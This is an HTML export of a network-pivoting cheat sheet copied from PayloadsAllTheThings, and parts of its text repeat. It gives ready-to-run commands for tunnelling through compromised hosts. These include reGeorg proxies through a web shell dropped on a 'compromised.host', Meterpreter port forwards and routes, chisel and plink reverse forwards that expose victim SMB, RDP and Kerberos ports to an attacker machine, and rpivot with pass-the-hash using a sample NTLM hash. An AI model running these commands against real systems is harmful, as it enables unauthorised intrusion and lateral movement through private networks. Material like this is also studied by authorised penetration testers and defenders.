id="a5a01a65-b15f-419f-a4df-ed735f967f5d"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%203/ncat.html">ncat</a></td><td class="cell-S&quot;5i">ncat localhost 8080 -c &quot;ncat localhost 9090&quot;</td></tr><tr id="8b278331-3906-44d9-a93f-1c03ba17fe51"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%203/socat.html">socat</a></td><td class="cell-S&quot;5i">socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090</td></tr><tr id="82a31194-791d-45ba-a60e-e5466987f470"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%203/remote%20host%201.html">remote host 1</a></td><td class="cell-S&quot;5i">ncat -l -p 8080 &lt; file</td></tr><tr id="d72a47fc-9f9e-4643-a7bf-d2450d48bb6a"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%203/remote%20host%202.html">remote host 2</a></td><td class="cell-S&quot;5i">ncat -l -p 9090 &gt; newfile</td></tr></tbody></table></div><h2 id="6d4dc234-7526-4227-b7fa-d9d34f3ffc4a" class="">References</h2><ul id="bd96a6e2-d4ae-446c-a22a-a2605f1a580a" class="bulleted-list"><li><a href="https://bitrot.sh/cheatsheet/14-12-2017-pivoting/">Network Pivoting Techniques - Bit rot</a></li></ul><ul id="205619a9-8075-4a95-ae38-5b846cc1e518" class="bulleted-list"><li><a href="http://woshub.com/port-forwarding-in-windows/">Port Forwarding in Windows - Windows OS Hub</a></li></ul><ul id="9e81390f-aa04-448c-be35-0ed64a1b43a1" class="bulleted-list"><li><a href="https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences">Using the SSH “Konami Code” (SSH Control Sequences) - Jeff McJunkin</a></li></ul><ul id="3f062a35-e794-4575-b165-9912e91148fa" class="bulleted-list"><li><a href="https://artkond.com/2017/03/23/pivoting-guide/">A Red Teamer’s guide to pivoting- Mar 23, 2017 - Artem Kondratenko</a></li></ul><ul id="c1dfd208-d809-421a-bce4-436fb1b5ed76" class="bulleted-list"><li><a href="https://www.information-security.fr/pivoting-meterpreter/">Pivoting Meterpreter</a></li></ul><ul id="0c748c74-43f3-4513-a2a9-ede1b86f213b" class="bulleted-list"><li><a href="https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/">Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni</a></li></ul><h1 id="b6ab6c46-2620-4927-bb13-07c9d4e22835" class="">Network Pivoting Techniques</h1><h2 id="aeb603c4-4bff-4964-bbf5-63bf88ba60c1" class="">Summary</h2><ul id="771b0908-9911-4014-b301-2d69eb022ced" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#windows-netsh-port-forwarding">Windows netsh Port Forwarding</a></li></ul><ul id="dbc8f18f-c1bd-4d2f-93d1-eece27f14728" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#ssh">SSH</a> <ul id="1b05566a-a87c-4079-a504-a0dedbfa15d1" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#socks-proxy">SOCKS Proxy</a></li></ul><ul id="cf39a5c6-a523-48f9-89dd-8db39b95bbad" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#local-port-forwarding">Local Port Forwarding</a></li></ul><ul id="94f9cac8-d4d4-437e-94fe-176a0a23c482" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#remote-port-forwarding">Remote Port Forwarding</a></li></ul></li></ul><ul id="600fff23-b82e-4292-b280-fdca824c7b9d" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#proxychains">Proxychains</a></li></ul><ul id="44ef4b2c-d7f5-4fd9-92ca-dd2f952eec19" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#web-socks---regeorg">Web SOCKS - reGeorg</a></li></ul><ul id="1c8d1da6-3d4b-48b6-8f2f-a9d6755635db" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#metasploit">Metasploit</a></li></ul><ul id="7b87e42d-3406-49c1-b2d6-0045d784a110" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#sshuttle">sshuttle</a></li></ul><ul id="6afc206d-d185-47e4-91c7-2ae78929a256" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#chisel">chisel</a></li></ul><ul id="8b9a4fc8-9570-4a7a-9e11-6c88549183b3" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#rpivot">Rpivot</a></li></ul><ul id="0e2574d5-f4aa-4ba0-b939-90558edb3941" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#plink">plink</a></li></ul><ul id="8bbc72d8-3f2f-4b13-9c7e-86334ac24dac" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#ngrok">ngrok</a></li></ul><ul id="43e30930-060b-4275-92f8-71df622b68d6" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#basic-pivoting-types">Basic Pivoting Types</a> <ul id="5aedb8d8-5b72-4013-905d-170bf3d721e7" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#listen---listen">Listen - Listen</a></li></ul><ul id="617da7f9-c24e-4c12-9345-a76d953b5664" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#listen---connect">Listen - Connect</a></li></ul><ul id="5201257b-7ab9-457f-90f3-d04325c4d09b" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#connect---connect">Connect - Connect</a></li></ul></li></ul><ul id="8e296c9f-60e9-4d97-95f8-9ca50e7396ed" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#references">References</a></li></ul><h2 id="dc893d90-7be6-4ebe-8e17-e4690528058d" class="">Windows netsh Port Forwarding</h2><pre id="f9d8cc90-f7a1-4ee9-a97e-626b34615235" class="code"><code>netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110</code></pre><ol id="7d7fe1ad-6b06-4016-9df3-ce44b233f6e9" class="numbered-list" start="1"><li>listenaddress – is a local IP address waiting for a connection.</li></ol><ol id="0b5add8b-2d20-48a3-b7b7-c036adebd35e" class="numbered-list" start="2"><li>listenport – local listening TCP port (the connection is waited on it).</li></ol><ol id="cb91fd9d-2d8b-4bf1-8047-234bc4a117e2" class="numbered-list" start="3"><li>connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.</li></ol><ol id="930f6106-dac8-4a66-831c-7c2b3c6c7909" class="numbered-list" start="4"><li>connectport – is a TCP port to which the connection from listenport is forwarded to.</li></ol><h2 id="040a7180-2b43-4d2b-bf32-b3ffdb1a1f6e" class="">SSH</h2><h3 id="80d25bac-9e07-4126-aaea-7132f5f56c32" class="">SOCKS Proxy</h3><pre id="054d2b23-0a59-4ba5-a102-959e78f5436b" class="code"><code>ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command</code></pre><p id="6c043206-577d-4b37-b969-a99f2e3f6502" class="">Cool Tip : Konami SSH Port forwarding</p><pre id="4f9eaafc-6284-4738-98a9-1a8772cbe288" class="code"><code>[ENTER] + [~C]
-D 1090</code></pre><h3 id="ec04ed9c-c446-4c2b-9ee3-12cf05ebaeb4" class="">Local Port Forwarding</h3><pre id="1d5ba9cd-dedd-4dbc-94a3-a13600b7b209" class="code"><code>ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]</code></pre><h3 id="a425662a-bb40-4d2f-a02d-7baa52c23764" class="">Remote Port Forwarding</h3><pre id="63c161b7-bb9e-4b8c-850e-02856c292782" class="code"><code>ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32</code></pre><h2 id="adf3ddc6-368b-4592-8c54-9f8f1e89b969" class="">Proxychains</h2><p id="bd2ed9cd-09d8-428f-9e00-9368ee09e15e" class=""><strong>Config file</strong>: /etc/proxychains.conf</p><pre id="6b848a1f-5ed9-4368-9e44-77e1d9c781e0" class="code"><code>[ProxyList]
socks4 localhost 8080</code></pre><p id="9f87ec5a-7424-471b-bbbf-edcc6affd757" class="">Set the SOCKS4 proxy then <code>proxychains nmap -sT 192.168.5.6</code></p><h2 id="a87a2c0f-71d2-48c6-afe1-41d72c4e7a51" class="">Web SOCKS - reGeorg</h2><p id="e22240b3-bd75-4de6-bd8a-8ac841984880" class=""><a href="https://github.com/sensepost/reGeorg">reGeorg</a>, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.</p><p id="2de6d0cb-1477-4837-a7dc-3d710e6a3cb4" class="">Drop one of the following files on the server:</p><ul id="a4e412d6-b6a5-4e75-9041-bfae9640bfaf" class="bulleted-list"><li>tunnel.ashx</li></ul><ul id="db9204d2-a9e5-47d3-86c6-0c888831f6f9" class="bulleted-list"><li>tunnel.aspx</li></ul><ul id="30ea3ae3-7aeb-4338-b247-7f1c875b9ef9" class="bulleted-list"><li>tunnel.js</li></ul><ul id="f7a8eb10-e32c-4bf3-9269-1d61473833aa" class="bulleted-list"><li>tunnel.jsp</li></ul><ul id="a9c2102f-d8f1-4e49-8272-1dc8712e20a7" class="bulleted-list"><li>tunnel.nosocket.php</li></ul><ul id="aa5eed46-9e2d-476b-acef-25669dae46be" class="bulleted-list"><li>tunnel.php</li></ul><ul id="e10491b7-9d3c-486e-ad9a-17b2539f0e9e" class="bulleted-list"><li>tunnel.tomcat.5.jsp</li></ul><pre id="531b1c0a-6763-490c-bd8d-d76205a315da" class="code"><code>python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]</code></pre><h2 id="f5f76fb8-8d8d-488f-975d-7d77b1da9491" class="">Metasploit</h2><pre id="964751cd-1082-463c-b2eb-b6255ac7f158" class="code"><code># Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 

or

# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush</code></pre><h2 id="b5e8ee65-d1b7-4ba8-940e-f6e879020888" class="">sshuttle</h2><p id="ecea15fb-9ff1-4b5a-9dbd-bf136e857092" class="">Transparent proxy server that works as a poor man&#x27;s VPN. Forwards over ssh.</p><ul id="fd1cd908-341b-406e-a281-8a056bbaeacf" class="bulleted-list"><li>Doesn&#x27;t require admin.</li></ul><ul id="eb15043e-5024-4c1d-99cb-ed356df03b43" class="bulleted-list"><li>Works with Linux and MacOS.</li></ul><ul id="53fc4522-3939-4bfa-844f-a86847b8ebd6" class="bulleted-list"><li>Supports DNS tunneling.</li></ul><pre id="8093caed-9953-4a6a-a87e-ae33109e7490" class="code"><code>pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24</code></pre><h2 id="9cf52efe-0510-4f43-b382-80f2bbcd8f51" class="">chisel</h2><pre id="1c968688-bd56-48af-aa53-953c7c03cea3" class="code"><code>go get -v github.com/jpillora/chisel

# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse</code></pre><h2 id="a4668cb2-f596-401e-8454-34e9b80a4131" class="">Rpivot</h2><p id="1a8a5f27-68ac-4ec5-a3b6-6fa0b9ff963d" class="">Server (Attacker box)</p><pre id="f0205fef-5b22-4022-a0a8-1e5609ff5d34" class="code"><code>python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0</code></pre><p id="aaf69d92-eb12-4d84-8c27-5f04a139f5f7" class="">Client (Compromised box)</p><pre id="bd297ef3-1d06-430e-bb91-90facca4f742" class="code"><code>python client.py --server-ip &lt;ip&gt; --server-port 9443</code></pre><p id="e60e6c4a-ac28-401e-b9a3-fd9fc03b082e" class="">Through corporate proxy</p><pre id="f7c7fd24-d41d-4bdc-ae58-d4df3d2655bb" class="code"><code>python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e</code></pre><p id="9392127c-e948-4ce9-97eb-cbf7f5305f65" class="">Passing the hash</p><pre id="56b2d5d7-a926-4a23-bcbd-9bda2641e803" class="code"><code>python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE</code></pre><h2 id="0652e779-07cf-439e-bead-7917aa3680d5" class="">plink</h2><pre id="95acf56c-b5c8-425f-a6a3-6c4f98a7ec57" class="code"><code># exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:127.0.0.1:445 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389  

plink -l root -pw mypassword 192.168.18.84 -R
plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185</code></pre><h2 id="db186e30-6b7a-4af9-8b3b-77751a9b2874" class="">ngrok</h2><pre id="e5916ebe-7391-4b50-95b9-63d7b594783c" class="code"><code># get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433</code></pre><h2 id="8836a1c5-e0c6-4736-9867-2bb73e70f292" class="">Basic Pivoting Types</h2><div id="4bcb374c-9e72-41b5-b8c1-fb58197f6e4d" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="9c96db76-b2ac-4dec-99d3-296e7d4ce211"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%204/Listen%20Listen.html">Listen - Listen</a></td><td class="cell-#^G6">Exposed asset, may not want to connect out.</td></tr><tr id="d7b439f1-3ce5-4575-a447-a41dbe279223"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%204/Listen%20Connect.html">Listen - Connect</a></td><td class="cell-#^G6">Normal redirect.</td></tr><tr id="5eefff10-9c8c-412d-ad30-87cb859625e6"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%204/Connect%20Connect.html">Connect - Connect</a></td><td class="cell-#^G6">Can’t bind, so connect to bridge two hosts</td></tr></tbody></table></div><h3 id="467e15f6-7c35-4e96-acf1-108726458e6c" class="">Listen - Listen</h3><div id="8dfb5120-a7f1-4e0a-8562-4455debdac39" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="76577ce0-67d0-47e1-932c-c4275821b019"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%205/ncat.html">ncat</a></td><td class="cell-@)4f">ncat -v -l -p 8080 -c &quot;ncat -v -l -p 9090&quot;</td></tr><tr id="3cf6802e-cae9-4f88-86ae-dac273ded7ba"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%205/socat.html">socat</a></td><td class="cell-@)4f">socat -v tcp-listen:8080 tcp-listen:9090</td></tr><tr id="273a18fb-b211-440c-b544-757dd5073e8d"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%205/remote%20host%201.html">remote host 1</a></td><td class="cell-@)4f">ncat localhost 8080 &lt; file</td></tr><tr id="e453b7b2-d799-49c8-99f3-aa656559c150"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%205/remote%20host%202.html">remote host 2</a></td><td class="cell-@)4f">ncat localhost 9090 &gt; newfile</td></tr></tbody></table></div><h3 id="5d461e87-43d9-416c-89b4-c7c487a7f14c" class="">Listen - Connect</h3><div id="ab082ea2-f1a6-4dd3-afc6-a847161f7447" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="73993326-6a89-4c5b-8f01-4d1b5d19ea96"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%206/ncat.html">ncat</a></td><td class="cell-K,U^">ncat -l -v -p 8080 -c &quot;ncat localhost 9090&quot;</td></tr><tr id="2a2baa93-f9c9-48f2-bd7b-b73c2e1358ed"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%206/socat.html">socat</a></td><td class="cell-K,U^">socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090</td></tr><tr id="0d68d250-4eed-45bc-b975-f628b1974262"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%206/remote%20host%201.html">remote host 1</a></td><td class="cell-K,U^">ncat localhost -p 8080 &lt; file</td></tr><tr id="78b2d89e-1e46-4758-913c-c58fc3735fff"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%206/remote%20host%202.html">remote host 2</a></td><td class="cell-K,U^">ncat -l -p 9090 &gt; newfile</td></tr></tbody></table></div><h3 id="3b0bf12a-f99e-42e0-9500-959c0a436755" class="">Connect - Connect</h3><div id="5a112da8-f3a9-43bf-9474-bbe70f428f60" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Type</th><th>Use Case</th></tr></thead><tbody><tr id="9661ddc0-fa55-4d56-8e0a-f2e580fd7d37"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%207/ncat.html">ncat</a></td><td class="cell-~9dK">ncat localhost 8080 -c &quot;ncat localhost 9090&quot;</td></tr><tr id="850a1d23-3c9f-4cc3-8f9a-d465249c06e4"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%207/socat.html">socat</a></td><td class="cell-~9dK">socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090</td></tr><tr id="b45d7917-5c38-475a-bfb3-675743399ae8"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%207/remote%20host%201.html">remote host 1</a></td><td class="cell-~9dK">ncat -l -p 8080 &lt; file</td></tr><tr id="eda7dbf8-0f5f-405e-a704-2e6dc04bfafe"><td class="cell-title"><a href="Network%20Pivoting%20Techniques/Untitled%20Database%207/remote%20host%202.html">remote host 2</a></td><td class="cell-~9dK">ncat -l -p 9090 &gt; newfile</td></tr></tbody></table></div><h2 id="b7ab0809-0ae8-4226-81e9-1b8022701a12" class="">References</h2><ul id="f3051689-b179-4c67-b678-d5500e525e12" class="bulleted-list"><li><a href="https://bitrot.sh/cheatsheet/14-12-2017-pivoting/">Network Pivoting Techniques - Bit rot</a></li></ul><ul id="a48c4c1a-af02-4668-83c1-3084a1e6b27d" class="bulleted-list"><li><a href="http://woshub.com/port-forwarding-in-windows/">Port Forwarding in Windows - Windows OS Hub</a></li></ul><ul id="ee38b22b-0f18-4ebf-8e9d-4d323853cfc6" class="bulleted-list"><li><a href="https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences">Using the SSH &quot;Konami Code&quot; (SSH Control Sequences) - Jeff McJunkin</a></li></ul><ul id="06dca1ea-f8ec-47e6-bf3c-519805d2a4fb" class="bulleted-list"><li><a href="https://artkond.com/2017/03/23/pivoting-guide/">A Red Teamer&#x27;s guide to pivoting- Mar 23, 2017 - Artem Kondratenko</a></li></ul><ul id="33639fe5-a3fb-4169-81d3-78904a306651" class="bulleted-list"><li><a href="https://www.information-security.fr/pivoting-meterpreter/">Pivoting Meterpreter</a></li></ul><ul id="9852e4e6-d9ef-4daf-bfb1-0fc276f8f92c" class="bulleted-list"><li><a href="https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/">Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni</a></li></ul></div></article></body></html>